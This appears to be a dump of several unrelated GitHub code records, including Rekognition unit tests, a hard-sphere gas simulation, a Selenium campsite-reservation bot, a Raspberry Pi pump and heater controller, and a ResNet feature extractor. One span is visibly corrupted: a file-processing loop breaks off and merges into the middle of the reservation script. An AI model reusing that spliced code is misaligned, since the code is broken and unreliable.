expected_response)\n\n with stubber:\n labels = detect_labels(\"bucket-name\", \"object-key\")\n\n assert labels == [\"Label1\", \"Label2\", \"Label3\"]\n\n\ndef test_process_labels():\n labels = [\"Label1\", \"Label2\", \"Label3\"]\n bucket_name = \"bucket-name\"\n object_key = \"object-key\"\n\n process_labels(labels, bucket_name, object_key)\n\n\ndef test_detect_text():\n rekognition = boto3.client(\"rekognition\")\n stubber = Stubber(rekognition)\n\n expected_response = {\n \"TextDetections\": [\n {\"DetectedText\": \"Time: 10:30 AM\"},\n {\"DetectedText\": \"Date: July 10, 2023\"},\n {\"DetectedText\": \"Temperature: 
70°F\"},\n ]\n }\n\n stubber.add_response(\"detect_text\", expected_response)\n\n with stubber:\n texts = detect_text(\"bucket-name\", \"object-key\")\n\n assert texts == [\"Time: 10:30 AM\", \"Date: July 10, 2023\", \"Temperature: 70°F\"]\n\n\ndef test_process_text():\n texts = [\"Time: 10:30 AM\", \"Date: July 10, 2023\", \"Temperature: 25°C\"]\n bucket_name = \"bucket-name\"\n object_key = \"object-key\"\n\n process_text(texts, bucket_name, object_key)\n","repo_name":"justinhauer/rekognition_trail_cam","sub_path":"tests/services/test_rekognition_service.py","file_name":"test_rekognition_service.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29955917430","text":"import numpy as np\nimport sys\nfrom matplotlib.collections import EllipseCollection\nfrom matplotlib.patches import Polygon\nfrom matplotlib import pyplot as plt\nfrom matplotlib import animation\nfrom scipy.spatial.distance import squareform, pdist\n\n\ndef norm(x):\n return np.sqrt(np.dot(x, x))\n\n\ndef sqrt(x):\n \"\"\"Safe square root\"\"\"\n return np.sqrt(np.clip(x, 0, np.inf))\n\n\nclass VelocityPanel(object):\n \"\"\"\n A display panel in addition to the box. Here, showing velocity histogram\n \"\"\"\n def __init__(self, box):\n self.box = box\n self.cbox = box.cbox\n box.panel = self\n\n def init(self, ax):\n self.ax = ax\n self.ax.clear()\n b = self.box\n cb = self.cbox\n ax.set_xlabel('velocity along x')\n ax.get_yaxis().set_visible(False)\n f, bins = np.histogram(cb.v[:, 0], int(np.sqrt(cb.N)), range=(cb.vxmin, cb.vxmax), density=True)\n binwidth = bins[1] - bins[0]\n\n # Create bar graph\n self.vhist = ax.bar(bins[:-1], f, width=binwidth, align='edge')\n\n p0 = ax.get_position()\n p1 = ax.get_position()\n ax.set_position([p1.x0, p0.y0, p0.width, p0.height])\n return self.vhist,\n\n def update(self, i):\n b = self.box\n cb = self.cbox\n\n # Recompute histogram\n nbins = len(self.vhist)\n f, bins = np.histogram(cb.v[:, 0], nbins, range=(cb.vxmin, cb.vxmax), density=True)\n self.ax.set_xlim(cb.vxmin, cb.vxmax)\n binwidth = bins[1] - bins[0]\n\n # Update histogram\n for i in range(nbins):\n self.vhist[i].set_height(f[i])\n self.vhist[i].set_width(binwidth)\n self.vhist[i].set_facecolor(b.cm((bins[i] + .5 * binwidth) ** 2 / cb.v2max))\n self.vhist[i].set_x(bins[i])\n # Adjust vertical extent.\n ylim = self.ax.get_ylim()[1]\n dylim = 1.2 * f.max() - ylim\n if abs(dylim) > .1 * ylim:\n new_ylim = ylim + .1 * (dylim)\n self.ax.set_ylim(ymax=new_ylim)\n\n return self.vhist,\n\nclass SpeedPanel(object):\n \"\"\"\n A display panel in addition to the box. 
Here, showing velocity histogram\n \"\"\"\n def __init__(self, box):\n self.box = box\n self.cbox = box.cbox\n box.panel = self\n\n def init(self, ax):\n self.ax = ax\n self.ax.clear()\n b = self.box\n cb = self.cbox\n\n ax.set_xlabel('velocity along x')\n ax.get_yaxis().set_visible(False)\n f, bins = np.histogram(np.sqrt((cb.v ** 2).sum(axis=1)), int(np.sqrt(cb.N)),\n range=(0., cb.v2max), density=True)\n binwidth = bins[1] - bins[0]\n\n # Create bar graph\n self.vhist = ax.bar(bins[:-1], f, width=binwidth, align='edge')\n\n p0 = ax.get_position()\n p1 = ax.get_position()\n ax.set_position([p1.x0, p0.y0, p0.width, p0.height])\n return self.vhist,\n\n def update(self, i):\n b = self.box\n cb = self.cbox\n\n # Recompute histogram\n nbins = len(self.vhist)\n f, bins = np.histogram(np.sqrt((cb.v**2).sum(axis=1)), nbins, range=(0, cb.v2max), density=True)\n self.ax.set_xlim(0, cb.v2max)\n binwidth = bins[1] - bins[0]\n\n # Update histogram\n for i in range(nbins):\n self.vhist[i].set_height(f[i])\n self.vhist[i].set_width(binwidth)\n self.vhist[i].set_facecolor(b.cm((bins[i] + .5 * binwidth) ** 2 / cb.v2max))\n self.vhist[i].set_x(bins[i])\n # Adjust vertical extent.\n ylim = self.ax.get_ylim()[1]\n dylim = 1.2 * f.max() - ylim\n if abs(dylim) > .1 * ylim:\n new_ylim = ylim + .1 * (dylim)\n self.ax.set_ylim(ymax=new_ylim)\n\n return self.vhist,\n\nclass MFPPanel(object):\n \"\"\"\n A display panel in addition to the box. Here, showing mean free path plot\n \"\"\"\n\n def __init__(self, box):\n self.box = box\n self.cbox = box.cbox\n self.trace_length = 1\n self.nbins = 30\n box.panel = self\n\n def init(self, ax):\n self.ax = ax\n ax.clear()\n b = self.box\n cb = self.cbox\n\n ax.set_xlabel('free path')\n ax.get_yaxis().set_visible(False)\n ax.set_ylim(ymin=0.)\n f, bins = np.histogram([], self.nbins, range=(0, 3*cb.mfp), density=True)\n binwidth = bins[1] - bins[0]\n\n # Create bar graph\n self.vhist = ax.bar(bins[:-1], f, width=binwidth, align='edge')\n\n p0 = ax.get_position()\n p1 = ax.get_position()\n ax.set_position([p1.x0, p0.y0, p0.width, p0.height])\n return self.vhist,\n\n def update(self, i):\n b = self.box\n cb = self.cbox\n\n # Recompute histogram\n x, y = cb.trace.get_data()\n if len(x) <= self.trace_length:\n # Nothing to do\n return self.vhist,\n self.trace_length = len(x)\n paths = np.sqrt(np.diff(x)**2 + np.diff(y)**2)\n xlim = max(3*cb.mfp, paths.max())\n f, bins = np.histogram(paths, self.nbins, range=(0, xlim), density=True)\n self.ax.set_xlim(0, xlim)\n binwidth = bins[1] - bins[0]\n\n # Update histogram\n for i in range(self.nbins):\n self.vhist[i].set_height(f[i])\n self.vhist[i].set_width(binwidth)\n self.vhist[i].set_x(bins[i])\n\n # Adjust vertical extent\n self.ax.set_ylim(ymax=1.2*f.max())\n\n return self.vhist,\n\nclass PressurePanel(object):\n \"\"\"\n A display panel in addition to the box. 
Here, showing cumulative momentum on one of the walls\n \"\"\"\n\n def __init__(self, box):\n self.box = box\n self.cbox = box.cbox\n self.trace_length = 1\n self.nbins = 30\n box.panel = self\n\n def init(self, ax):\n self.ax = ax\n ax.clear()\n self.cbox._pressure = 0\n self.plot_pressure = ax.plot([0], [0], 'b-', label='Total momentum')[0]\n self.plot_pressure_theory = ax.plot([0, 0], [0, 0], 'k-', label='Total momentum (theory)')[0]\n ax.legend(loc='upper left')\n ax.set_xlabel('time')\n ax.set_ylabel('momentum')\n ax.set_ylim(ymin=0.)\n\n p0 = ax.get_position()\n p1 = ax.get_position()\n ax.set_position([p1.x0, p0.y0, p0.width, p0.height])\n return self.plot_pressure, self.plot_pressure_theory\n\n def update(self, i):\n b = self.box\n cb = self.cbox\n\n # Update plot data\n self.plot_pressure.set_data(cb._pressure_t, cb._wall_momentum)\n self.plot_pressure_theory.set_data([0, cb._pressure_t[-1]], [0, cb._wall_momentum_theory])\n self.ax.set_xlim(0, cb._pressure_t[-1])\n self.ax.set_ylim(np.min(cb._wall_momentum), np.max(cb._wall_momentum))\n return self.plot_pressure, self.plot_pressure_theory\n\nclass TimePanel(object):\n \"\"\"\n A display panel in addition to the box. Here, showing mean free path plot\n \"\"\"\n\n def __init__(self, box):\n self.box = box\n box.panel = self\n\n def init(self, ax):\n self.ax = ax\n ax.clear()\n b = self.box\n\n def update(self, i):\n b = self.box\n\n\nclass Box(object):\n\n def __init__(self, cbox, **kwargs):\n \"\"\"\n Wrapper for a CBox implementing visualisation.\n \"\"\"\n self.cbox = cbox\n\n self.fig = plt.figure()\n\n self.panel = None\n\n self.show_trace = None\n self.show_quiver = None\n self.quiver_scale = 35.\n\n # For molecule trace\n self._vtrace = None\n\n # Default coloring\n self.colors = 'velocities'\n\n self._colors = None\n\n self.cids = []\n\n # Create display\n self._init()\n\n self._i = None\n self.animobj = None\n self.interval = 5.\n\n self.highlight_rule = None\n\n self._update_callback = None\n\n @classmethod\n def generic(cls, N=150, L=200., D=3., T=1., ndim=2):\n \"\"\"\n Create a generic box with a given number of particles, given diameter, box dimensions and reduced temperature.\n self.N = N # number of particles\n \"\"\"\n if np.isscalar(L):\n L = L*np.ones((ndim,))\n\n # Positions\n r = np.array([L[i]*np.random.uniform(size=(N,)) for i in range(ndim)]).T\n\n # Masses\n m = np.ones((N,))\n\n # Diameters\n d = D*np.ones((N,))\n\n # Velocities\n v = np.random.normal(size=(N, ndim))\n v /= np.sqrt((v**2).sum()/N)\n v *= np.sqrt(2*T/m[:, np.newaxis])\n\n cbox = CBox(L, r, v, d, m)\n\n return cls(cbox)\n\n def run(self, nsteps=100000, filename=None, blit=False, block=None):\n \"\"\"Start animation\n\n nsteps: number of steps\n filename: if not None, movie file to save to (work in progress)\n blit: False by default, does not work always\n block: if True, return only after run is done, if False return immediately\n if None, returns only in interactive mode\n \"\"\"\n self._i = 0\n self.nsteps = nsteps\n self.animobj = animation.FuncAnimation(self.fig, self._update, frames=nsteps, interval=self.interval, repeat=False, blit=blit)\n if filename is not None:\n Writer = animation.writers['ffmpeg']\n writer = Writer(fps=150, bitrate=500, extra_args=['-filter', 'tblend', '-r', '25'])\n self.animobj._start()\n self.animobj.save(filename, writer=writer)\n else:\n self.animobj._start()\n plt.show(block=False)\n if block or ((block is None) and not hasattr(sys, 'ps1')):\n plt.pause(.1)\n while self.animobj.event_source and 
self.animobj.event_source.callbacks:\n plt.pause(.1)\n\n def stop(self):\n try:\n self.animobj._stop()\n except:\n pass\n\n def _init(self):\n \"\"\"\n Initialise display\n \"\"\"\n cb = self.cbox\n\n # No update during setup\n plt.ioff()\n self.fig.clear()\n\n if self.panel is not None:\n # Create two side-by-side axes, with a histogram of the x-component of the velodicities in the second one.\n axes = [self.fig.add_subplot(121, aspect='equal', adjustable='box'),\n self.fig.add_subplot(122)]\n else:\n # Create just one axis - the particle box\n axes = [self.fig.add_subplot(111, aspect='equal', adjustable='box')]\n\n # Set box size and axis properties\n axes[0].axis([0, cb.L[0], 0, cb.L[1]])\n axes[0].get_xaxis().set_visible(False)\n axes[0].get_yaxis().set_visible(False)\n\n # Draw particles\n circles = EllipseCollection(widths=cb.d, heights=cb.d, angles=0, units='xy',\n facecolors='k', offsets=cb.r, transOffset=axes[0].transData)\n axes[0].add_collection(circles)\n\n # Create colormap\n self.cm = plt.get_cmap('plasma')\n\n self.fig.tight_layout()\n self.circles = circles\n\n to_return = (circles,)\n\n # Option to show the trace of one particle (to illustrate random walk)\n if self.show_trace is not None:\n i = self.show_trace\n self.trace = axes[0].plot([cb.r[i, 0]], [cb.r[i,1]], 'k-')[0]\n self._vtrace = cb.v[i].copy()\n to_return += (self.trace,)\n\n # Option to show velocity arrows\n if self.show_quiver:\n quiver = plt.quiver(cb.r[:, 0], cb.r[:, 1], cb.v[:, 0], cb.v[:, 1], units='xy', scale=self.quiver_scale*cb.vRMS/cb.L.mean())\n self.quiver = quiver\n to_return += (quiver,)\n\n self.axes = axes\n\n if self.panel is not None:\n to_return += self.panel.init(axes[1])\n\n # Process all obstacles (polygons)\n if cb.obstacles:\n for obs in cb.obstacles:\n vc = obs['vertices']\n axes[0].add_patch(Polygon(vc, facecolor='black'))\n\n # (re)connect events\n self._connect()\n\n return to_return\n\n def set_fig_position(self, x, y, dx, dy):\n \"\"\"Set figure windoe position (might work only with QT backend)\"\"\"\n plt.get_current_fig_manager().window.setGeometry(x, y, dx, dy)\n\n def set_colors(self, colors=None):\n if colors is None:\n colors = self._colors\n else:\n self._colors = colors\n self.circles.set_facecolors(colors)\n\n def _connect(self):\n \"\"\"\n Manage event connections\n FIXME: This does not work.\n \"\"\"\n canvas = self.fig.canvas\n # Disconnect eventual connections\n for cid in self.cids:\n canvas.mpl_disconnect(cid)\n # Reconnect\n self.cids.append(canvas.mpl_connect('button_press_event', self.onpress))\n self.cids.append(canvas.mpl_connect('key_press_event', self.onkeypress))\n self.cids.append(canvas.mpl_connect('close_event', self.onclose))\n self.cids.append(canvas.mpl_connect('scroll_event', self.onscroll))\n return\n\n def onpress(self, event):\n pass\n\n def onkeypress(self, event):\n if event.key in ['space']:\n print('blip!')\n #self.animobj._stop()\n\n def onclose(self, event):\n pass\n\n def onscroll(self, event):\n pass\n\n def _update(self, i):\n \"\"\"Update plot\"\"\"\n cb = self.cbox\n\n self.i = i\n\n # Compute move\n cb.step()\n\n # Move molecules\n self.circles.set_offsets(cb.r)\n\n # Change colours\n if self.colors == 'velocities':\n vmag = np.sqrt((cb.v**2).sum(axis=1))\n self.set_colors(self.cm(vmag/cb.v2max))\n\n to_return = (self.circles,)\n\n if self.panel is not None:\n to_return += self.panel.update(i)\n\n if self.show_trace is not None:\n i = self.show_trace\n newv = cb.v[i]\n x, y = self.trace.get_data()\n if not np.allclose(self._vtrace, 
newv):\n x = np.append(x, cb.r[i,0])\n y = np.append(y, cb.r[i,1])\n else:\n x[-1] = cb.r[i,0]\n y[-1] = cb.r[i,1]\n self.trace.set_data(x,y)\n self._vtrace = newv.copy()\n to_return += (self.trace,)\n\n if self.show_quiver:\n self.quiver.set_offsets(cb.r)\n self.quiver.set_UVC(cb.v[:, 0], cb.v[:, 1])\n to_return += (self.quiver,)\n\n if self.highlight_rule:\n highlighted = eval(self.highlight_rule, cb.__dict__)\n lw = 5.\n self.circles.set_lw([lw if h else 0. for h in highlighted])\n self.circles.set_edgecolors(['yellow' if h else 'black' for h in highlighted])\n if self.show_quiver:\n self.quiver.set_UVC(highlighted*cb.v[:, 0], highlighted*cb.v[:, 1])\n\n if self._update_callback is not None:\n self._update_callback(i)\n\n return to_return\n\n def show(self):\n plt.ion()\n\n\nclass CBox(object):\n\n def __init__(self, L, r, v, d, m, **kwargs):\n \"\"\"\n Create a box with particles inside.\n \"\"\"\n N, ndim = r.shape\n if np.isscalar(L):\n L = L*np.ones((ndim,))\n\n self.N = N\n self.ndim = ndim\n self.L = L\n self.r = r\n self.v = v\n self.d = d\n self.m = m\n\n self.bounds = [[0, L[i]] for i in range(ndim)]\n\n # Initialise time\n self.t = 0.\n\n # Number of steps (defined in run)\n self.nsteps = None\n\n # Total time and time step (computed in init)\n self.dt = None\n self.t = 0.\n self.i = 0\n\n # Mean free path\n self.mfp = None\n\n # Initialise other necessary attributes\n self.r0 = None # This will store the previous positions\n self.v0 = None # For previous velocities\n\n # Gravity\n self.g = 0.\n\n # Velocity statistics\n self.v2max = None\n self.vxmin, self.vxmax = None, None\n self.vymin, self.vymax = None, None\n\n # For pressure calculation\n self._pressure = None\n self._wall_momentum = [0.]\n self._wall_momentum_theory = 0.\n self._pressure_t = [0.]\n\n # Real volume\n self.real_volume = None\n\n # For obstacle collisions\n self.obstacles = []\n\n # Callbacks\n self._collision_callback = None\n self._walls_callback = None\n self._obs_callback = None\n\n self.init()\n\n @classmethod\n def generic(cls, N=150, L=200., D=3., T=1., ndim=2):\n \"\"\"\n Create a generic box with a given number of particles, given diameter, box dimensions and reduced temperature.\n self.N = N # number of particles\n \"\"\"\n if np.isscalar(L):\n L = L*np.ones((ndim,))\n\n # Positions\n r = np.array([L[i]*np.random.uniform(size=(N,)) for i in range(ndim)]).T\n\n # Masses\n m = np.ones((N,))\n\n # Diameters\n d = D*np.ones((N,))\n\n # Velocities\n v = np.random.normal(size=(N, ndim))\n v /= np.sqrt((v**2).sum()/N)\n v *= np.sqrt(2*T/m[:, np.newaxis])\n\n return cls(L, r, v, d, m)\n\n @property\n def T(self):\n \"\"\"Temperature\"\"\"\n return (.5*self.m * (self.v**2).sum(axis=1)).mean()\n\n @property\n def vRMS(self):\n \"\"\"RMS velocity\"\"\"\n return np.sqrt((self.v**2).sum(axis=1).mean())\n\n @property\n def P(self):\n \"\"\"Pressure - in 2D, P = U/A\"\"\"\n return (.5*self.m * (self.v**2).sum(axis=1)).sum() / self.real_volume\n\n def init(self):\n \"\"\"\n Reinitialise all quantities.\n \"\"\"\n # Velocity statistics\n self.v2max = np.sqrt((self.v**2).sum(axis=1)).max()\n self.vxmin, self.vxmax = self.v[:, 0].min(), self.v[:, 0].max()\n self.vymin, self.vymax = self.v[:, 1].min(), self.v[:, 1].max()\n\n # Optimal time step ~ .25 * (D/v_RMS)\n self.dt = .25*self.d.mean()/np.sqrt(2*(self.v**2).mean())\n\n # Mean free path\n self.mfp = np.prod(self.L)/(4.*self.N*self.d.mean())\n\n # Volume\n self.real_volume = np.prod(self.L-self.d.mean()) - .5*np.pi*sum(self.d**2)\n\n # For pressure 
calculation\n self._pressure = None\n self._wall_momentum = [0.]\n self._wall_momentum_theory = 0.\n self._pressure_t = [0.]\n\n def add_obstacle(self, vc):\n \"\"\"\n Add an obstacle (convex polygon defined by vertices vc).\n \"\"\"\n # Construct edges info\n edges = []\n for i in range(len(vc)):\n a = vc[i] - vc[i-1]\n n = np.array([-a[1], a[0]])\n n /= norm(n)\n edges.append((n, np.dot(n, vc[i])))\n\n # Store\n self.obstacles.append({'vertices': vc, 'edges': edges})\n\n def update_stats(self):\n \"\"\"\n Update statistics\n \"\"\"\n vmag = np.sqrt((self.v**2).sum(axis=1))\n self.v2max = max(self.v2max, vmag.max())\n self.vxmax = max(self.vxmax, self.v[:, 0].max())\n self.vxmin = min(self.vxmin, self.v[:, 0].min())\n self.vymax = max(self.vymax, self.v[:, 1].max())\n self.vymin = min(self.vymin, self.v[:, 1].min())\n\n def step(self):\n \"\"\"\n Move by one step\n \"\"\"\n # Increment\n self.i += 1\n self.r += self.dt * self.v\n self.t += self.dt\n\n # Process collisions\n self.walls(self._walls_callback)\n self.collide(callback=self._collision_callback)\n self.obs_collide(self._obs_callback)\n\n # Update statistics\n self.update_stats()\n\n def walls(self, callback=None):\n \"\"\"\n Process wall collisions.\n\n TODO: implement wall callback\n \"\"\"\n for dim in range(self.ndim):\n # \"Negative\" wall\n d0 = self.r[:, dim] - .5*self.d - self.bounds[dim][0]\n self.r[d0 < 0, dim] -= 2*d0[d0 < 0]\n self.v[d0 < 0, dim] *= -1\n # \"Positive\" wall\n d1 = self.r[:, dim] + .5*self.d - self.bounds[dim][1]\n self.r[d1 > 0, dim] -= 2*d1[d1 > 0]\n self.v[d1 > 0, dim] *= -1\n\n if self._pressure == dim:\n #self._pressure_t.append(self._pressure_t[-1] + self.dt)\n #self._wall_momentum.append(self._wall_momentum[-1] - 2 * sum(self.m[d1 > 0] * self.v[d1 > 0, dim]))\n #self._wall_momentum_theory.append(self._wall_momentum_theory[-1] + self.P*self.L[dim]*self.dt)\n self._pressure_t.append(self.t)\n self._wall_momentum.append(self._wall_momentum[-1] - 2 * sum(self.m[d1 > 0] * self.v[d1 > 0, dim]))\n self._wall_momentum_theory = self.P*self.L[dim]*self.t\n\n def obs_collide(self, callback=None):\n \"\"\"\n Process collisions with additional rectangular obstacles\n\n TODO: implement obstacle callback\n \"\"\"\n for obs in self.obstacles:\n vc = obs['vertices']\n ec = obs['edges']\n Nn = len(ec)\n\n nn = np.array([n for n,e in ec])\n\n # Find molecules that collided\n dw = np.array([np.dot(self.r, n) - .5*self.d - e for n, e in ec]).T\n hit = (dw < 0).all(axis=1)\n\n if not hit.any():\n # No particle collided\n continue\n\n Nh = hit.sum()\n\n # Work on subset\n r = self.r[hit]\n v = self.v[hit]\n d = self.d[hit]\n dw = dw[hit]\n\n # Find which facet was hit\n dta = dw / np.dot(v, nn.T)\n dta[dta < 0] = 1e12\n\n # Which wall was hit?\n wi = np.argmin(dta, axis=1)\n\n # How long ago?\n dt = np.min(dta, axis=1)\n\n # Backtrack\n rc = r - dt[:, None]*v\n\n # Process individually\n for i in range(Nh):\n rcc = rc[i]\n rr = r[i]\n vv = v[i]\n dd = d[i]\n\n # Check if we hit a corner\n vc0, vc1 = vc[wi[i]-1], vc[wi[i]]\n vcc = None\n if np.dot(rcc-vc0, vc1 - vc0) < 0:\n vcc = vc0\n elif np.dot(rcc-vc1, vc0 - vc1) < 0:\n vcc = vc1\n\n if vcc is not None:\n # Corner collision\n dr = rr - vcc\n\n ndv = norm(vv)\n ru = np.dot(vv, dr) / ndv\n b2 = ru**2 + .25*dd**2 - np.dot(dr, dr)\n if b2 < 0:\n # No collision - this should not happen\n continue\n\n ds = ru + sqrt(b2)\n dtc = ds / ndv\n drc = dr - vv * dtc\n\n # Store new values\n v[i] = vv - 2. 
* drc * np.dot(vv, drc) / np.dot(drc, drc)\n                    r[i] = rr + (v[i] - vv) * dtc\n\n                else:\n                    # Edge collision\n                    v[i] -= 2 * np.dot(v[i], nn[wi[i]]) * nn[wi[i]]\n                    r[i] = rcc + dt[i]*v[i]\n\n            # Put everything back in\n            self.v[hit] = v\n            self.r[hit] = r\n\n    def collide(self, callback=None):\n        \"\"\"\n        Process any collisions\n\n        callback, if not None, is a function with signature callback(self, particle_index1, particle_index2)\n        and is called after updating positions and velocities.\n        \"\"\"\n\n        # Find colliding particles\n        D = squareform(pdist(self.r))\n        ind1, ind2 = np.where(D < .5*np.add.outer(self.d, self.d))\n        unique = (ind1 < ind2)\n        ind1 = ind1[unique]\n        ind2 = ind2[unique]\n\n        # Process collisions\n        for p1, p2 in zip(ind1, ind2):\n\n            # Initial parameters\n            v1, v2 = self.v[p1], self.v[p2]\n            r1, r2 = self.r[p1], self.r[p2]\n            d1, d2 = self.d[p1], self.d[p2]\n            m1, m2 = self.m[p1], self.m[p2]\n\n            # Relative positions and velocities\n            dv = v2-v1\n            dr = r2-r1\n\n            # Backtrack\n            ndv = norm(dv)\n            if ndv == 0:\n                # Special case: overlapping particles with same velocities\n                ndr = norm(dr)\n                offset = .5*dr*(.5*(d1+d2)/ndr - 1.)\n                self.r[p1] -= offset\n                self.r[p2] += offset\n                continue\n            ru = np.dot(dv, dr)/ndv\n            ds = ru + sqrt(ru**2 + .25*(d1+d2)**2 - np.dot(dr, dr))\n            if np.isnan(ds):\n                # deliberate crash to flag a numerically impossible backtrack\n                1/0\n\n            # Time since collision\n            dtc = ds/ndv\n\n            # New collision parameter\n            drc = dr - dv*dtc\n\n            # Center of mass velocity\n            vcm = (m1*v1 + m2*v2)/(m1+m2)\n\n            # Velocities after collision\n            dvf = dv - 2.*drc * np.dot(dv, drc)/np.dot(drc, drc)\n            v1f = vcm - dvf * m2/(m1+m2)\n            v2f = vcm + dvf * m1/(m1+m2)\n\n            # Backtracked positions\n            r1f = r1 + (v1f-v1)*dtc\n            r2f = r2 + (v2f-v2)*dtc\n\n            # Update values\n            self.r[p1] = r1f\n            self.r[p2] = r2f\n            self.v[p1] = v1f\n            self.v[p2] = v2f\n\n            if callback is not None:\n                callback(self, p1, p2)\n","repo_name":"pierrethibault/thermosim","sub_path":"thermosim.py","file_name":"thermosim.py","file_ext":"py","file_size_in_byte":25227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"38571349842","text":"import re\r\nfo = open(\"prog.txt\", \"r+\") #opens a file\r\nstr = fo.read() \t\t\t #reads the file\r\nfo.close()\r\nwhile '$' in str:\r\n    i=0;\r\n    while i 0:\n        selected_tf = click_zone(\"A\")\n    elif empty_cnt_b > 0:\n        selected_tf = click_zone(\"B\")\n    elif empty_cnt_c > 0:\n        selected_tf = click_zone(\"C\")\n\n    return selected_tf\n\n\n# Dismiss the initial popup, then move on to checking the site for the reservation\ndef execute():\n    # Check for the popup; it may not be present\n    try:\n        driver.find_element_by_xpath('/html/body/div[4]/div[2]/div/form/div/span/a').click()\n    except:\n        time.sleep(0.1)\n    # Prepare for the reservation and check the site\n    while True:\n        if prepare_for_reservation():\n            reservation_click()\n            break\n        else:\n            print(DU.get_now_datetime_string())\n            time.sleep(1)\n    \n    # driver.close()\n\n\nif __name__ == \"__main__\":\n    # Read the site arguments to reserve from the program options\n    parser = argparse.ArgumentParser(description='Karaban Site Argument. A, B, C')\n    parser.add_argument('--week', type=int, help='2 ~ 7')\n    parser.add_argument('--yoil', type=int, help='Sun ... 
Sat: 1 ~ 7')\n args = parser.parse_args()\n\n list_args.append(args.week)\n list_args.append(args.yoil)\n print(f\"{list_args[0]}째주 {dict_yoil[list_args[1]]}요일\")\n\n execute()","repo_name":"etlers/python","sub_path":"reservation/karaban_cancel.py","file_name":"karaban_cancel.py","file_ext":"py","file_size_in_byte":8018,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15388060900","text":"import RPi.GPIO as GPIO\n\nclass PinController:\n def __init__(self):\n self.pump_one_pin = 12\n self.pump_two_pin = 10\n self.heater_pin = 8\n self.pump_one_state = GPIO.HIGH\n self.pump_two_state = GPIO.LOW\n self.heater_pin_state = GPIO.LOW\n self.pin_init()\n \n @staticmethod\n def cleanup():\n GPIO.cleanup()\n \n def get_pump_state(self, id):\n if id == \"1\":\n return bool(GPIO.input(self.pump_one_pin))\n elif id == \"2\":\n return bool(GPIO.input(self.pump_two_pin))\n \n def cycle_pump_state(self, id):\n if id == \"1\":\n self.cycle_pump_one()\n return bool(GPIO.input(self.pump_one_pin))\n elif id == \"2\":\n self.cycle_pump_two()\n return bool(GPIO.input(self.pump_two_pin))\n\n def cycle_pump_one(self):\n if GPIO.input(self.pump_one_pin) == GPIO.HIGH:\n GPIO.output(self.pump_one_pin, GPIO.LOW)\n else:\n GPIO.output(self.pump_one_pin, GPIO.HIGH)\n\n def cycle_pump_two(self):\n if GPIO.input(self.pump_two_pin) == GPIO.HIGH:\n GPIO.output(self.pump_two_pin, GPIO.LOW)\n else:\n GPIO.output(self.pump_two_pin, GPIO.HIGH)\n\n def cycle_heater(self, state):\n if state == GPIO.HIGH and self.pump_one_state == GPIO.HIGH:\n GPIO.output(self.heater_pin, GPIO.HIGH)\n elif state == GPIO.HIGH and self.pump_one_state == GPIO.LOW:\n raise Exception\n elif state == GPIO.LOW:\n GPIO.output(self.heater_pin, GPIO.LOW)\n\n def get_heater_pin(self):\n return self.heater_pin\n\n \n def pin_init(self):\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup([self.pump_one_pin, self.pump_two_pin, self.heater_pin], GPIO.OUT, initial=GPIO.LOW)\n","repo_name":"whatisbyandby/brewhouse-controller","sub_path":"pin_controller.py","file_name":"pin_controller.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22941836521","text":"#######################################\r\n# Copyright (C) 2020-2023 Otmar Ertl. #\r\n# All rights reserved. 
#\r\n#######################################\r\n\r\nlightblue = \"#a6cee3\"\r\ndarkblue = \"#1f78b4\"\r\nlightgreen = \"#b2df8a\"\r\ndarkgreen = \"#33a02c\"\r\nlightred = \"#fb9a99\"\r\ndarkred = \"#e31a1c\"\r\nlightorange = \"#fdbf6f\"\r\ndarkorange = \"#ff7f00\"\r\nlightviolet = \"#cab2d6\"\r\ndarkviolet = \"#6a3d9a\"\r\nyellow = \"#ffff99\"\r\nbrown = \"#b15928\"\r\n\r\ncolors = {\r\n \"TreeMinHash\": darkblue,\r\n \"BagMinHash1\": darkorange,\r\n \"BagMinHash2\": darkgreen,\r\n \"BagMinHash1a\": lightviolet,\r\n \"DartMinHash\": darkorange,\r\n \"ICWS\": darkred,\r\n \"TreeMinHash1\": brown,\r\n \"TreeMinHash1a_0.5_0.9\": yellow,\r\n \"TreeMinHash1a_0.5_0.99\": darkblue,\r\n \"TreeMinHash1a_0.7_0.99\": darkorange,\r\n \"TreeMinHash1a_0.3_0.99\": darkviolet,\r\n \"TreeMinHash1x\": lightgreen,\r\n \"TreeMinHash1a\": darkred,\r\n \"TreeMinHash1_NonStreaming\": lightorange,\r\n}\r\n","repo_name":"oertl/treeminhash","sub_path":"python/color_defs.py","file_name":"color_defs.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"78"} +{"seq_id":"25808642150","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport torchvision.models as models\nimport include.extractors as resnetextractor\nfrom PIL import Image\n\nnorm_mean = [0.485, 0.456, 0.406]\nnorm_std = [0.229, 0.224, 0.225]\n\ntransform = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(norm_mean, norm_std),\n])\n\nwith open('imagenet_classes.txt') as f:\n classes = [line.strip() for line in f.readlines()]\n\ndevice = torch.device(\"cpu\")\nnet = models.resnet50(pretrained=True)\nnet = resnetextractor.ResnetFeatureExtractor(net)\nnet.to(device)\nnet.eval()\n\ndataset = []\nimg = Image.open(\"dog.jpg\")\nimg_t = transform(img)\nbatch_t = torch.unsqueeze(img_t, 0)\ndataset.append(batch_t)\n\n# 使用torch.no_grad的话在前向传播中不记录梯度,节省内存\nwith torch.no_grad():\n for data in dataset:\n # 预测\n data = data.to(device)\n outputs = net(data)\n _, indices = torch.sort(outputs[-1], descending=True)\n percentage = torch.nn.functional.softmax(outputs[-1], dim=1)[0] * 100\n print(outputs)\n print([(classes[idx], percentage[idx].item()) for idx in indices[0][:5]])\n","repo_name":"KunWuLuan/newStory","sub_path":"result_of_all_layers.py","file_name":"result_of_all_layers.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} 